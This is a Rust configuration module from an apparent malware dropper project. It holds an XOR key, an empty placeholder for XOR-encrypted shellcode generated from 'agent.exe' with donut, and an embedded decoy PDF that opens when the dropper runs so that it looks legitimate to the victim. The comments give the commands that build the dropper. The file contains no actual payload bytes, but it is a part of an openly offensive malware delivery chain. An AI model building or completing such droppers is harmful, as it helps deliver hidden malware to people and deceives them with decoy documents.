//! Configuration module for the dropper
//! 
//! This file contains the embedded shellcode and XOR key.
//! It will be auto-generated by the builder tool with actual values.
//!
//! To generate shellcode from agent.exe:
//! 1. Use donut: donut.exe -i agent.exe -o shellcode.bin
//! 2. Use builder: ./builder build-dropper --shellcode shellcode.bin --output dropper.exe

// ============================================================================
// SHELLCODE CONFIGURATION
// ============================================================================
// These values will be replaced by the builder tool

/// XOR key for decrypting the shellcode
/// This should be randomly generated for each build
pub const XOR_KEY: &[u8] = &[
    0x4a, 0x8f, 0x2c, 0xd1, 0x73, 0xb5, 0x9e, 0x47, 
    0x1a, 0xf6, 0x83, 0x5d, 0x29, 0xc4, 0x67, 0xab,
    0x3e, 0x91, 0xd8, 0x54, 0x0c, 0xe2, 0x76, 0xb9,
    0x45, 0x1f, 0xa3, 0x6d, 0x88, 0xc0, 0x52, 0xf4
];

/// XOR-encrypted shellcode (generated from agent.exe via donut)
/// This is a placeholder - will be replaced by the builder
pub const ENCRYPTED_SHELLCODE: &[u8] = &[];

// ============================================================================
// DECOY DOCUMENT
// ============================================================================

/// Embedded PDF decoy data (minimal valid PDF)
/// This PDF will be opened when the dropper executes to look legitimate
pub const DECOY_PDF_DATA: &[u8] = include_bytes!("decoy.pdf");

// If no decoy.pdf exists at compile time, use empty
// The build process should create a minimal PDF or use a real one

